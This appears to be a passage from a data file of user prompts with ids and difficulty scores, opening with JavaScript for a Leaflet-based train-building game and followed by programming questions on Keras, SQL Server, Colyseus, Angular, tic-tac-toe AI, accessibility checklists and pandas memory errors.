clickedPoints[0].feature.geometry.coordinates;
const secondCityCoords =
clickedPoints[1].feature.geometry.coordinates;
const polyline = L.polyline(
clickedPoints.map((p) => p.getLatLng())
).addTo(map);
const firstCity = clickedPoints[0].feature.properties.city;
const secondCity = clickedPoints[1].feature.properties.city;
clickedPoints = [];
isLineDrawn = true;
// Remove click event listener after a line has been drawn
map.off("click");
// Set the map bounds to show the area with the polyline
map.fitBounds(polyline.getBounds());
money = money - 50000; // Subtract 50000 from money
const moneyDisplay = document.getElementById("moneydisplay");
const moneyString = `£${money}`; // Assuming money is a number
moneyDisplay.textContent = moneyString;
const instructionsElement = document.getElementById("instructions");
// Clear any existing content in the instructions element:
instructionsElement.innerHTML = "";
// Create separate paragraph elements:
const congratulationsParagraph = document.createElement("p");
congratulationsParagraph.textContent = `Congratulations you have built your first train line from ${firstCity} to ${secondCity}!`;
const costsParagraph = document.createElement("p");
costsParagraph.textContent = `Your construction costs were £50,000. You have £50,000 remaining.`;
const buyTrainParagraph = document.createElement("p");
buyTrainParagraph.textContent = "You now need to buy a train.";
const newTrainParagraph = document.createElement("p");
newTrainParagraph.textContent =
"At this time you can only afford to buy the train engine the Sleeping Lion. The Sleeping Lion has a traveling speed of 60 miles per hour. It can pull four carriages. Which means your train will have a capacity of around 120 seated passengers";
const traincost = document.createElement("p");
traincost.textContent = `The Sleeping Lion will cost you £30,000 to purchase. Do you wish to buy the Sleeping Lion?`;
// Append paragraphs to the instructions element:
instructionsElement.appendChild(congratulationsParagraph);
instructionsElement.appendChild(costsParagraph);
instructionsElement.appendChild(buyTrainParagraph);
instructionsElement.appendChild(newTrainParagraph);
instructionsElement.appendChild(traincost);
// Add button element:
const buyButton = document.createElement("button");
buyButton.id = "buybutton";
buyButton.textContent = "Buy Train";
// Append the button element to the instructions element:
instructionsElement.appendChild(buyButton);
//buybutton event listener
document
.getElementById("buybutton")
.addEventListener("click", function () {
// Check if you have enough money before purchase
money = money - 30000; // Subtract 30000 from money
const moneyDisplay = document.getElementById("moneydisplay");
const moneyString = `£${money}`;
moneyDisplay.textContent = moneyString;
// Update instructions content after successful purchase
instructionsElement.innerHTML = ""; // Clear previous content
const successMessage = document.createElement("p");
successMessage.textContent = `You now have a train line from ${firstCity} to ${secondCity} and a train! Press the button below to begin operations.`;
instructionsElement.appendChild(successMessage);
// Add button element:
const trainButton = document.createElement("button");
trainButton.id = "trainbutton";
trainButton.textContent = "Start Train";
// Append the button element to the instructions element:
instructionsElement.appendChild(trainButton);
trainButton.addEventListener("click", function () {
console.log("Train Started");
//emptyinstructions add improvement buttons
instructionsElement.innerHTML = ""; // Clear previous content
//randomgeneration of dailybonus
function generateDailyBonus(minBonus, maxBonus) {
const randomNumber =
Math.floor(Math.random() * (maxBonus - minBonus + 1)) +
minBonus;
dailybonus += randomNumber;
console.log(`Daily bonus of ${randomNumber} added!`);
}
//buy carriages
//add carriages button
const carriageButton = document.createElement("button");
carriageButton.id = "trainbutton";
carriageButton.textContent = "Buy Train Carriage";
const carriageMessage = document.createElement("p");
carriageMessage.textContent = `Buy another passenger carriage for your train for £20,000`;
instructionsElement.appendChild(carriageMessage);
// Append the button element to the instructions element:
instructionsElement.appendChild(carriageButton);
//cariagebutton logic
carriageButton.addEventListener("click", () => {
console.log("Carriage Bought");
// Check if enough money is available
if (money >= 20000) {
// Check if maximum number of carriages reached
if (numberOfCarriages < 4) {
numberOfCarriages++;
money -= 20000; // Subtract 20000 from money
const moneyDisplay =
document.getElementById("moneydisplay");
const moneyString = `£${money}`;
moneyDisplay.textContent = moneyString;
// Update marker content using the previously retrieved reference
markerContent.textContent = numberOfCarriages;
// Remove button and message if max carriages reached after purchase
if (numberOfCarriages === 4) {
instructionsElement.removeChild(carriageButton);
instructionsElement.removeChild(carriageMessage);
}
} else {
console.log(
"Maximum number of carriages reached! You can't buy more."
);
instructionsElement.removeChild(carriageButton);
instructionsElement.removeChild(carriageMessage);
}
}
});
//buy station cafes
//add station one cafe button
const stationOneMessage = document.createElement("p");
stationOneMessage.textContent = `Open a cafe in ${firstCity} Station for £2,500.`;
instructionsElement.appendChild(stationOneMessage);
// Add button element:
const cafeOneButton = document.createElement("button");
cafeOneButton.id = "trainbutton";
cafeOneButton.textContent = "Buy Cafe";
// Append the button element to the instructions element:
instructionsElement.appendChild(cafeOneButton);
//cafeonelogic
cafeOneButton.addEventListener("click", () => {
if (money >= 2500) {
// add a random number between 2000 and 7000 to dailbonus
generateDailyBonus(2000, 7000); // Call with cafe bonus range
cafeOneBonus = dailybonus;
console.log("Cafe one bought");
money -= 2500;
const moneyDisplay =
document.getElementById("moneydisplay");
const moneyString = `£${money}`;
moneyDisplay.textContent = moneyString;
instructionsElement.removeChild(cafeOneButton);
instructionsElement.removeChild(stationOneMessage);
//fetch data from Overpass API around first station
buildingRadius += 150;
const overpassQuery = `
[out:json];
way["building"](around:${buildingRadius},${firstCityCoords[1]},${firstCityCoords[0]});
out body;
>;
out skel qt;
`;
fetch("https://overpass-api.de/api/interpreter", {
method: "POST",
headers: {
"Content-Type": "application/x-www-form-urlencoded",
},
body: "data=" + encodeURIComponent(overpassQuery),
})
.then((response) => response.json())
.then((data) => {
// Process the data returned by the Overpass API
data.elements.forEach((element) => {
if (element.type === "way") {
// Extract coordinates from the way element
const coordinates = element.nodes.map(
(nodeId) => {
const node = data.elements.find(
(node) => node.id === nodeId
);
return [node.lat, node.lon];
}
);
// Create a polyline for the road
const polyline = L.polyline(coordinates, {
color: "#333333",
weight: 1,
}).addTo(map);
}
});
})
.catch((error) => {
console.error("Error fetching data:", error);
});
} else {
}
});
//add station two cafe buttons
const stationTwoMessage = document.createElement("p");
stationTwoMessage.textContent = `Open a cafe in ${secondCity} Station for £2,500.`;
instructionsElement.appendChild(stationTwoMessage);
// Add button element:
const cafeTwoButton = document.createElement("button");
cafeTwoButton.id = "trainbutton";
cafeTwoButton.textContent = "Buy Cafe";
// Append the button element to the instructions element:
instructionsElement.appendChild(cafeTwoButton);
//cafetwologic
cafeTwoButton.addEventListener("click", () => {
if (money >= 2500) {
// Generate a random number between 2000 (inclusive) and 7000 (exclusive)
generateDailyBonus(2000, 7000); // Call with cafe bonus range
cafeTwoBonus = dailybonus;
console.log("Cafe two bought");
money -= 2500;
const moneyDisplay =
document.getElementById("moneydisplay");
const moneyString = `£${money}`;
moneyDisplay.textContent = moneyString;
instructionsElement.removeChild(cafeTwoButton);
instructionsElement.removeChild(stationTwoMessage);
//fetch data from Overpass API around first station
buildingRadius2 += 150;
const overpassQuery = `
[out:json];
way["building"](around:${buildingRadius2},${secondCityCoords[1]},${secondCityCoords[0]});
out body;
>;
out skel qt;
`;
fetch("https://overpass-api.de/api/interpreter", {
method: "POST",
headers: {
"Content-Type": "application/x-www-form-urlencoded",
},
body: "data=" + encodeURIComponent(overpassQuery),
})
.then((response) => response.json())
.then((data) => {
// Process the data returned by the Overpass API
data.elements.forEach((element) => {
if (element.type === "way") {
// Extract coordinates from the way element
const coordinates = element.nodes.map(
(nodeId) => {
const node = data.elements.find(
(node) => node.id === nodeId
);
return [node.lat, node.lon];
}
);
// Create a polyline for the road
const polyline = L.polyline(coordinates, {
color: "#333333",
weight: 1,
}).addTo(map);
}
});
});
} else {
}
});
//buyhotel
const hoteloneMessage = document.createElement("p");
hoteloneMessage.textContent = `Open a hotel in ${firstCity} Station for £10,000.`;
instructionsElement.appendChild(hoteloneMessage);
// Add button element:
const hoteloneButton = document.createElement("button");
hoteloneButton.id = "trainbutton";
hoteloneButton.textContent = "Buy Hotel";
// Append the button element to the instructions element:
instructionsElement.appendChild(hoteloneButton);
//hotelonelogic
hoteloneButton.addEventListener("click", () => {
if (money >= 10000) {
generateDailyBonus(8000, 24000); // Call with cafe bonus range
hotelOneBonus = dailybonus;
money -= 10000;
const moneyDisplay =
document.getElementById("moneydisplay");
const moneyString = `£${money}`;
moneyDisplay.textContent = moneyString;
instructionsElement.removeChild(hoteloneButton);
instructionsElement.removeChild(hoteloneMessage);
//fetch data from Overpass API around first station
buildingRadius += 200;
const overpassQuery = `
[out:json];
way["building"](around:${buildingRadius},${firstCityCoords[1]},${firstCityCoords[0]});
out body;
>;
out skel qt;
`;
fetch("https://overpass-api.de/api/interpreter", {
method: "POST",
headers: {
"Content-Type": "application/x-www-form-urlencoded",
},
body: "data=" + encodeURIComponent(overpassQuery),
})
.then((response) => response.json())
.then((data) => {
// Process the data returned by the Overpass API
data.elements.forEach((element) => {
if (element.type === "way") {
// Extract coordinates from the way element
const coordinates = element.nodes.map(
(nodeId) => {
const node = data.elements.find(
(node) => node.id === nodeId
);
return [node.lat, node.lon];
}
);
// Create a polyline for the road
const polyline = L.polyline(coordinates, {
color: "#333333",
weight: 1,
}).addTo(map);
}
});
});
} else {
}
});
const hoteltwoMessage = document.createElement("p");
hoteltwoMessage.textContent = `Open a hotel in ${secondCity} Station for £10,000.`;
instructionsElement.appendChild(hoteltwoMessage);
// Add button element:
const hoteltwoButton = document.createElement("button");
hoteltwoButton.id = "trainbutton";
hoteltwoButton.textContent = "Buy Hotel";
// Append the button element to the instructions element:
instructionsElement.appendChild(hoteltwoButton);
//hotelonelogic
hoteltwoButton.addEventListener("click", () => {
if (money >= 10000) {
generateDailyBonus(8000, 24000); // Call with cafe bonus range
hotelTwoBonus = dailybonus;
money -= 10000;
const moneyDisplay =
document.getElementById("moneydisplay");
const moneyString = `£${money}`;
moneyDisplay.textContent = moneyString;
instructionsElement.removeChild(hoteltwoButton);
instructionsElement.removeChild(hoteltwoMessage);
//fetch data from Overpass API around first station
buildingRadius2 += 200;
const overpassQuery = `
[out:json];
way["building"](around:${buildingRadius2},${secondCityCoords[1]},${secondCityCoords[0]});
out body;
>;
out skel qt;
`;
fetch("https://overpass-api.de/api/interpreter", {
method: "POST",
headers: {
"Content-Type": "application/x-www-form-urlencoded",
},
body: "data=" + encodeURIComponent(overpassQuery),
})
.then((response) => response.json())
.then((data) => {
// Process the data returned by the Overpass API
data.elements.forEach((element) => {
if (element.type === "way") {
// Extract coordinates from the way element
const coordinates = element.nodes.map(
(nodeId) => {
const node = data.elements.find(
(node) => node.id === nodeId
);
return [node.lat, node.lon];
}
);
// Create a polyline for the road
const polyline = L.polyline(coordinates, {
color: "#333333",
weight: 1,
}).addTo(map);
}
});
});
} else {
}
});
//landdeveloper
if (cafeOneBonus > 0 && cafeTwoBonus > 0 && hotelOneBonus > 0 && hotelTwoBonus > 0) {
console.log("Conditions met! Adding circle markers.");
// Create green circle markers with radius 8
var greenCircleMarker1 = L.circleMarker(firstCityCoords, {
radius: 8,
color: 'green',
fillColor: 'green',
fillOpacity: 0.5
});
var greenCircleMarker2 = L.circleMarker(secondCityCoords, {
radius: 8,
color: 'green',
fillColor: 'green',
fillOpacity: 0.5
});
// Add markers to the map (assuming you have a map variable)
greenCircleMarker1.addTo(map);
greenCircleMarker2.addTo(map);
}
// starttrain
const firstPoint = L.latLng(
firstCityCoords[1],
firstCityCoords[0]
);
const secondPoint = L.latLng(
secondCityCoords[1],
secondCityCoords[0]
);
const intervalDuration = 10; // milliseconds per frame
const distance = firstPoint.distanceTo(secondPoint);
const steps = ((distance / speed) * 1000) / intervalDuration; // Assuming speed of 35 miles per hour
const latStep = (secondPoint.lat - firstPoint.lat) / steps;
const lngStep = (secondPoint.lng - firstPoint.lng) / steps;
const marker = L.marker(firstPoint, {
icon: L.divIcon({
className: "circle-marker", // Add a CSS class for styling (optional)
html: `<b>${numberOfCarriages}</b>`, // Include the number inside a bold tag
iconSize: [20, 20], // Adjust iconSize as needed (optional)
}),
}).addTo(map);
// Assuming the marker variable is defined in this scope
const markerContent = marker.getElement().querySelector("b"); // Assuming bold tag for number
const moveMarker = (speed) => {
if (progress < steps) {
const newLat = firstPoint.lat + latStep * progress;
const newLng = firstPoint.lng + lngStep * progress;
const newLatLng = L.latLng(newLat, newLng);
marker.setLatLng(newLatLng); // Update the marker's position
progress++;
setTimeout(function () {
moveMarker(speed);
}, intervalDuration);
} else {
// Marker reaches the second point, update money
money +=
Math.floor(Math.random() * (2000 - 1000 + 1)) +
1000 * numberOfCarriages;
const moneyDisplay =
document.getElementById("moneydisplay");
const moneyString = `£${money}`;
moneyDisplay.textContent = moneyString;
// Wait two seconds before animating back and call moveBackMarker recursively
setTimeout(() => {
moveBackMarker(speed);
}, 2000); // Wait for 2 seconds (2000 milliseconds)
}
};
const moveBackMarker = (speed) => {
// Corrected calculation for animating back from second point to first
if (progress > 0) {
const newLat =
secondPoint.lat - latStep * (steps - progress);
const newLng =
secondPoint.lng - lngStep * (steps - progress);
const newLatLng = L.latLng(newLat, newLng);
marker.setLatLng(newLatLng); // Update the marker's position
progress--;
setTimeout(function () {
moveBackMarker(speed);
}, intervalDuration);
} else {
console.log("Reached starting point again.");
// Add random number to money and update display
money +=
Math.floor(Math.random() * (2000 - 1000 + 1)) +
1000 * numberOfCarriages;
const moneyDisplay =
document.getElementById("moneydisplay");
const moneyString = `£${money}`;
moneyDisplay.textContent = moneyString;
// Reset progress for next round trip
progress = 0;
// Recursively call moveMarker to start next animation cycle
moveMarker(speed);
}
};
moveMarker(speed); // Start the animation
});
});
}
else {
selectedMarker = e.target; // Set the clicked marker as selected
// Optional visual indication for selection (e.g., reduce opacity)
}
}
});
return circleMarker;
},
});
}
fetch("gb.geojson")
.then((response) => response.json())
.then((geojson) => {
L.geoJSON(geojson, {
fillColor: "none", // Style for polygon (empty fill)
weight: 1,
color: "#000",
opacity: 1,
fillOpacity: 0,
}).addTo(map);
})
.catch((error) => {
console.error("Error loading GeoJSON:", error);
});
fetch("cities.geojson")
.then((response) => response.json())
.then((geojson) => {
createCircleMarkers(geojson).addTo(map);
})
.catch((error) => {
console.error("Error loading GeoJSON:", error);
});
//24 hour clock display
const TIME_MULTIPLIER = 60 * 10; // 10 minutes = 600 seconds
// Function to format time in 24-hour format with leading zeros
function formatTime(hours, minutes) {
// Handle the case where minutes reach 60 (should display the next hour)
if (minutes === 60) {
hours++;
minutes = 0;
}
return `${hours.toString().padStart(2, "0")}:${minutes
.toString()
.padStart(2, "0")}`;
}
// Function to update the clock display and handle daily bonus
function updateClock() {
const currentTime = new Date();
// Simulate game time by multiplying actual time with multiplier
const gameTime = new Date(currentTime.getTime() * TIME_MULTIPLIER);
// Get hours and minutes in 24-hour format
let hours = gameTime.getHours();
// Get minutes and force them to the nearest multiple of 10 (ending in 0)
let minutes = Math.floor(gameTime.getMinutes() / 10) * 10;
// Format the time string with fixed minute handling
const formattedTime = formatTime(hours, minutes);
// Update the content of the div with the formatted time
document.getElementById("timedisplay").textContent = formattedTime;
// Check if it's midnight (00:00)
if (hours === 0 && minutes === 0) {
// Generate random daily bonus (modify as needed)
money += cafeOneBonus + cafeTwoBonus + hotelOneBonus;
const moneyDisplay = document.getElementById("moneydisplay");
const moneyString = `£${money}`;
moneyDisplay.textContent = moneyString;
console.log(
`Daily bonus of ${
cafeOneBonus + cafeTwoBonus + hotelOneBonus + hotelTwoBonus
} added! Total money: ${money}`
); // You can replace console.log with your desired action
}
}
// Call the updateClock function initially
updateClock();
// Update the clock every second to simulate smooth time progression
setInterval(updateClock, 1000);
'
|
5206dedbb71e40d2d3a77c2213dd1b8a
|
{
"intermediate": 0.44431936740875244,
"beginner": 0.3869270086288452,
"expert": 0.16875363886356354
}
|
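The condition above fails because the if block runs exactly once, synchronously, inside the "Start Train" click handler - before any cafe or hotel button has been clicked - so all four bonus variables are still 0, and nothing ever re-evaluates the check. A sketch of one fix, using the same variable names and assuming it sits in the same closure as firstCityCoords and secondCityCoords: wrap the check in a function and call it at the end of each purchase handler. (Note also that the GeoJSON coordinates are [lng, lat] while Leaflet expects [lat, lng], which the existing L.latLng(firstCityCoords[1], firstCityCoords[0]) calls already account for.)

let stationMarkersAdded = false;

function maybeAddStationMarkers() {
  if (stationMarkersAdded) return; // only add the markers once
  if (cafeOneBonus > 0 && cafeTwoBonus > 0 && hotelOneBonus > 0 && hotelTwoBonus > 0) {
    stationMarkersAdded = true;
    const style = { radius: 8, color: "green", fillColor: "green", fillOpacity: 0.5 };
    // GeoJSON order is [lng, lat]; Leaflet wants [lat, lng]
    L.circleMarker([firstCityCoords[1], firstCityCoords[0]], style).addTo(map);
    L.circleMarker([secondCityCoords[1], secondCityCoords[0]], style).addTo(map);
  }
}

// then call maybeAddStationMarkers() at the end of each cafe/hotel click
// handler, right after the corresponding bonus variable is set.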
46,748
|
python asdl
|
8c0d22692f6e1478a65e50b26ce3015c
|
{
"intermediate": 0.3639878034591675,
"beginner": 0.334367573261261,
"expert": 0.30164462327957153
}
|
46,749
|
inputs = tf.keras.Input(shape=(1,200,))
x = tf.keras.layers.Embedding(64)(inputs)
x = layers.LSTM(200, return_sequences=True)(inputs)
x = layers.LSTM(64, return_sequences=True)(x)
x = layers.LSTM(64, return_sequences=True)(x)
x = layers.LSTM(64, return_sequences=True)(x)
x = layers.LSTM(128, return_sequences=True)(x)
x = layers.LSTM(256, return_sequences=True)(x)
x = layers.LSTM(64, return_sequences=True)(x)
x = layers.LSTM(64, return_sequences=True)(x)
x = layers.LSTM(64, return_sequences=True)(x)
x = layers.LSTM(128, return_sequences=True)(x)
x = layers.LSTM(256, return_sequences=True)(x)
outputs = layers.Dense(200)(x)
model = tf.keras.Model(inputs=inputs, outputs=outputs)
model.summary()
---------------------------------------------------------------------------
TypeError Traceback (most recent call last)
<ipython-input-103-15a76a050f6a> in <cell line: 5>()
3
4
----> 5 x = tf.keras.layers.Embedding(64)(inputs)
6 x = layers.LSTM(200, return_sequences=True)(inputs)
7 x = layers.LSTM(64, return_sequences=True)(x)
TypeError: Embedding.__init__() missing 1 required positional argument: 'output_dim'
|
31dd9cf84fd59fcb32f629ad1bbb2367
|
{
"intermediate": 0.3665541410446167,
"beginner": 0.28056877851486206,
"expert": 0.35287711024284363
}
|
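The traceback says it directly: keras.layers.Embedding requires both input_dim (the vocabulary size) and output_dim. Note also that the original graph feeds `inputs`, not the embedding output, into the first LSTM, so the embedding would be dead code even if it constructed. A minimal sketch; the vocabulary size is a placeholder assumption:

import tensorflow as tf
from tensorflow.keras import layers

vocab_size = 10000                                    # placeholder: your real vocab size
inputs = tf.keras.Input(shape=(200,), dtype="int32")  # 200 token ids per sample
x = layers.Embedding(input_dim=vocab_size, output_dim=64)(inputs)  # -> (batch, 200, 64)
x = layers.LSTM(200, return_sequences=True)(x)        # consume the embedding, not `inputs`
outputs = layers.Dense(200)(x)
model = tf.keras.Model(inputs=inputs, outputs=outputs)
model.summary()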
46,750
|
INTROGRESSION in genetic improvement
|
11063cab46ae9af668a5137130ed8555
|
{
"intermediate": 0.30194586515426636,
"beginner": 0.2571144998073578,
"expert": 0.44093963503837585
}
|
46,751
|
Login failed for user 'DESKTOP-21QL7RI\hp'. Reason: Server is in single user mode. Only one administrator can connect at this time. What is the solution to this problem?
|
de301ef503c186e7591c6aa523a60745
|
{
"intermediate": 0.3058943450450897,
"beginner": 0.34316983819007874,
"expert": 0.35093584656715393
}
|
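"Server is in single user mode" usually means the instance was started with the -m startup flag (common after an interrupted maintenance step), or that another administrator session already holds the single allowed connection. A sketch of the usual recovery on Windows, assuming the default instance name MSSQLSERVER:

:: stop the instance
net stop MSSQLSERVER
:: in SQL Server Configuration Manager -> SQL Server Services -> instance
:: Properties -> Startup Parameters, remove the "-m" entry, then restart:
net start MSSQLSERVER
:: if you instead need to KEEP single-user mode, take the one admin
:: connection from the command line with Windows authentication:
sqlcmd -S . -E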
46,752
|
sup
|
aff8407e1ec46964afd2ca330b9641e2
|
{
"intermediate": 0.3241104781627655,
"beginner": 0.3006082773208618,
"expert": 0.37528130412101746
}
|
46,753
|
How to handle a user disconnect on the Colyseus server side?
|
929557b7210dace2ac5efb1360ae30f9
|
{
"intermediate": 0.39433035254478455,
"beginner": 0.26746997237205505,
"expert": 0.3381996750831604
}
|
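Colyseus delivers disconnects to the room's onLeave(client, consented) hook; consented is true when the client left deliberately. The documented allowReconnection() helper holds the seat open for a reconnect window. A sketch; the players map and its fields are hypothetical application state:

import { Room, Client } from "colyseus";

export class GameRoom extends Room {
  async onLeave(client: Client, consented: boolean) {
    // mark the player as disconnected in your own state (hypothetical field)
    this.state.players.get(client.sessionId).connected = false;

    try {
      if (consented) throw new Error("consented leave"); // skip the wait
      await this.allowReconnection(client, 20);          // wait up to 20 s
      this.state.players.get(client.sessionId).connected = true;
    } catch (e) {
      // reconnection window expired or the leave was intentional: clean up
      this.state.players.delete(client.sessionId);
    }
  }
}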
46,754
|
"fifo_full, fifo_empty, fifo_wren, fifo_rden를 사용해서 FIFO를 사용하도록 코드를 수정하시오."를 영작해줘.
|
edd95dc30bd5dcd5ee6ebd21bb6a91a1
|
{
"intermediate": 0.20124953985214233,
"beginner": 0.6427111625671387,
"expert": 0.1560393124818802
}
|
46,755
|
What type of layer should I use for a translation model?
|
b89533ce31f40029038eaca4c12288ac
|
{
"intermediate": 0.12264930456876755,
"beginner": 0.12161096185445786,
"expert": 0.7557397484779358
}
|
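Translation is a sequence-to-sequence task: the standard choices are an Embedding layer feeding either a Transformer (stacked multi-head attention blocks) or, classically, a recurrent encoder-decoder. A minimal LSTM encoder-decoder sketch in Keras; all sizes are placeholder assumptions:

import tensorflow as tf
from tensorflow.keras import layers

src_vocab, tgt_vocab, emb_dim, units = 8000, 8000, 128, 256

enc_in = tf.keras.Input(shape=(None,), dtype="int32")        # source token ids
enc_emb = layers.Embedding(src_vocab, emb_dim)(enc_in)
_, state_h, state_c = layers.LSTM(units, return_state=True)(enc_emb)

dec_in = tf.keras.Input(shape=(None,), dtype="int32")        # shifted target ids
dec_emb = layers.Embedding(tgt_vocab, emb_dim)(dec_in)
dec_out = layers.LSTM(units, return_sequences=True)(dec_emb,
                                                    initial_state=[state_h, state_c])
logits = layers.Dense(tgt_vocab)(dec_out)                    # per-step vocabulary scores

model = tf.keras.Model([enc_in, dec_in], logits)
model.compile(optimizer="adam",
              loss=tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True))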
46,756
|
Make a minimax tic-tac-toe AI that meets the specific requirements in this category, and don't worry if it's too extensive:
1. Evaluation Function
- Evaluation Heuristics
2. Iterative Deepening
- Alpha-Beta Pruning
- Quiescence Search
3. Transposition Table
4. Move Ordering
- Transposition Move
- Good Captures
- Killer Moves
- Bad Captures
- History Heuristic
5. Repeat Detection
6. Aspiration Window
7. Principal Variation Search (PVS)
8. Root Node Optimization
9. Simple Time Management
10. Mate Distance Pruning
Required Modules:
- Board Representation Module
- Minimax Algorithm Module
- Alpha-Beta Pruning Module
- Evaluation Function Module
- Transposition Table Module
- Move Ordering Module
- Repeat Detection Module
- Time Management Module
- Mate Distance Pruning Module
|
74c02da91fe2df4d1b282e65bbe7fda3
|
{
"intermediate": 0.08922035992145538,
"beginner": 0.12124685943126678,
"expert": 0.7895327806472778
}
|
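Most of the requested machinery (quiescence search, good/bad captures, killer moves, aspiration windows, mate-distance pruning) comes from chess engines and has nothing to bite on in a 9-cell game with no captures; tic-tac-toe is solved exactly by plain minimax. A sketch of the core pieces that do apply - minimax, alpha-beta pruning, and a transposition table:

from functools import lru_cache

WIN_LINES = [(0,1,2),(3,4,5),(6,7,8),(0,3,6),(1,4,7),(2,5,8),(0,4,8),(2,4,6)]

def winner(board):                      # board: 9-char string of 'X', 'O', '.'
    for a, b, c in WIN_LINES:
        if board[a] != '.' and board[a] == board[b] == board[c]:
            return board[a]
    return None

@lru_cache(maxsize=None)                # doubles as the transposition table
def search(board, player, alpha, beta):
    w = winner(board)
    if w == 'X': return 1
    if w == 'O': return -1
    if '.' not in board: return 0       # draw
    best = -2 if player == 'X' else 2
    for i in range(9):
        if board[i] != '.':
            continue
        child = board[:i] + player + board[i+1:]
        score = search(child, 'O' if player == 'X' else 'X', alpha, beta)
        if player == 'X':
            best = max(best, score); alpha = max(alpha, best)
        else:
            best = min(best, score); beta = min(beta, best)
        if alpha >= beta:               # alpha-beta cutoff
            break
    return best

def best_move(board, player):
    pick = max if player == 'X' else min
    moves = [i for i in range(9) if board[i] == '.']
    return pick(moves, key=lambda i: search(
        board[:i] + player + board[i+1:], 'O' if player == 'X' else 'X', -2, 2))

print(best_move("." * 9, 'X'))          # every opening draws under perfect play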
46,757
|
While running the project using ng serve, a prompt window opens with Windows Script Host.
|
973ee2b2122aa6700d28528a8d7f5975
|
{
"intermediate": 0.366978257894516,
"beginner": 0.2812768816947937,
"expert": 0.3517448604106903
}
|
46,758
|
Hi, I am an accessibility consultant working on a checklist for content authors. I created one checklist, but my manager is not happy with it and is asking me to provide the mentioned details in a different format. I am providing you with the checklist details I have created:
"S. No. Content Author Checklist Category Status
1 Images meant for decorative purposes should have empty alternative text (alt=""). Images
2 Provide descriptive alternative text for all the informative images. Images
3 For complex images descriptive alternate content should be provided. Images
4 Pre-recorded audio-only content - A descriptive text transcript should be provided Multimedia
5 Pre-recorded video-only content(no audio track) - Either a text transcript or audio description could be provided. Multimedia
6 For pre-recorded audio, synchronized captions should be provided unless the media is a media alternative for text that is clearly labeled as such. Multimedia
7 For pre-recorded video content, an audio description should be provided (unless the media is a media alternative for text and is clearly labeled as such). Multimedia
8 Synchronized captions should be provided for all live multimedia that contains audio (audio-only broadcasts, web casts, video conferences, Flash animations, etc.). Multimedia
9 For Headings, H1-H6 should be provided in a hierarchical manner to navigate through section and sub sections. Navigation
10 Form fields should have visual indication of 'required' fields either using a "*" indication or a global static text. Forms
11 Placeholder attribute/text should not be used as an alternate to labels. Forms
12 Group the contents that logically fall into a list as Ordered list/Unordered list Links
14 Tables should have relevant headers. Table
17 Make sure that content presented on the page is logical & intuitive. The visual order should match the reading order. Navigation
18 While using shape and or location, provide visible labels/names to the controls. Content
19 When combining color and shape/size/location/orientation, provide off-screen text for screen reader users. Content
20 When using sound as a clue, combine it with text/color based clues. Content
22 The browser title (page title) should be clear, concise, and context-relevant to the page. Navigation
23 The purpose of each link (or form image button) should be determinable from the link text alone, or from the link text together with its context. Links
24 For the links/buttons with the same text that go to different locations should be readily distinguishable by means of additional content. Links
26 Users should be informed about links that open non-HTML resources, such as PDF files, Word files, PowerPoint files. Links
27 Page/Section Headings and labels should describe their topic or its purpose. Navigation
28 Ensure the language of the web page or part of page is declared using the lang attribute Content
29 Ensure that sufficient labels, instructions, and data formats are provided well in advance so users can enter appropriate data into input fields. Forms
30 "
Make sure that errors are distinguished from the regular text on the web page using descriptive text.
" Forms
31 Provide visible hints that will enable the users to avoid errors during form submissions. Forms
"The above defined Content Author Checklist points are created based on maximal coverage for Content Accessibility. The feasibility of fixing the defect depends on the Content Author Tool used by the Client/Project Team.
Note: Some tools in the market have option to hand code and some don't have access to basic scripts."
"
|
af8e28c22d207d19e9662898fe61a03b
|
{
"intermediate": 0.3887779712677002,
"beginner": 0.2871059775352478,
"expert": 0.3241160809993744
}
|
46,759
|
I have the following code to read my CSV file, which is 27 GB in size:
import pandas as pd
# Load the dataset using pandas
df = pd.read_csv(r"C:\Users\arisa\Desktop\combined_day.csv")
and I'm getting the following error:
{
"name": "MemoryError",
"message": "Unable to allocate 13.7 GiB for an array with shape (6317, 290138) and data type float64",
"stack": "---------------------------------------------------------------------------
MemoryError Traceback (most recent call last)
Cell In[1], line 3
1 import pandas as pd
2 # Load the dataset using pandas
----> 3 df = pd.read_csv(r\"C:\\Users\\arisa\\Desktop\\combined_day.csv\")
File c:\\Users\\arisa\\AppData\\Local\\Programs\\Python\\Python310\\lib\\site-packages\\pandas\\io\\parsers\\readers.py:1026, in read_csv(filepath_or_buffer, sep, delimiter, header, names, index_col, usecols, dtype, engine, converters, true_values, false_values, skipinitialspace, skiprows, skipfooter, nrows, na_values, keep_default_na, na_filter, verbose, skip_blank_lines, parse_dates, infer_datetime_format, keep_date_col, date_parser, date_format, dayfirst, cache_dates, iterator, chunksize, compression, thousands, decimal, lineterminator, quotechar, quoting, doublequote, escapechar, comment, encoding, encoding_errors, dialect, on_bad_lines, delim_whitespace, low_memory, memory_map, float_precision, storage_options, dtype_backend)
1013 kwds_defaults = _refine_defaults_read(
1014 dialect,
1015 delimiter,
(...)
1022 dtype_backend=dtype_backend,
1023 )
1024 kwds.update(kwds_defaults)
-> 1026 return _read(filepath_or_buffer, kwds)
File c:\\Users\\arisa\\AppData\\Local\\Programs\\Python\\Python310\\lib\\site-packages\\pandas\\io\\parsers\\readers.py:626, in _read(filepath_or_buffer, kwds)
623 return parser
625 with parser:
--> 626 return parser.read(nrows)
File c:\\Users\\arisa\\AppData\\Local\\Programs\\Python\\Python310\\lib\\site-packages\\pandas\\io\\parsers\\readers.py:1968, in TextFileReader.read(self, nrows)
1965 else:
1966 new_col_dict = col_dict
-> 1968 df = DataFrame(
1969 new_col_dict,
1970 columns=columns,
1971 index=index,
1972 copy=not using_copy_on_write(),
1973 )
1975 self._currow += new_rows
1976 return df
File c:\\Users\\arisa\\AppData\\Local\\Programs\\Python\\Python310\\lib\\site-packages\\pandas\\core\\frame.py:778, in DataFrame.__init__(self, data, index, columns, dtype, copy)
772 mgr = self._init_mgr(
773 data, axes={\"index\": index, \"columns\": columns}, dtype=dtype, copy=copy
774 )
776 elif isinstance(data, dict):
777 # GH#38939 de facto copy defaults to False only in non-dict cases
--> 778 mgr = dict_to_mgr(data, index, columns, dtype=dtype, copy=copy, typ=manager)
779 elif isinstance(data, ma.MaskedArray):
780 from numpy.ma import mrecords
File c:\\Users\\arisa\\AppData\\Local\\Programs\\Python\\Python310\\lib\\site-packages\\pandas\\core\\internals\\construction.py:503, in dict_to_mgr(data, index, columns, dtype, typ, copy)
499 else:
500 # dtype check to exclude e.g. range objects, scalars
501 arrays = [x.copy() if hasattr(x, \"dtype\") else x for x in arrays]
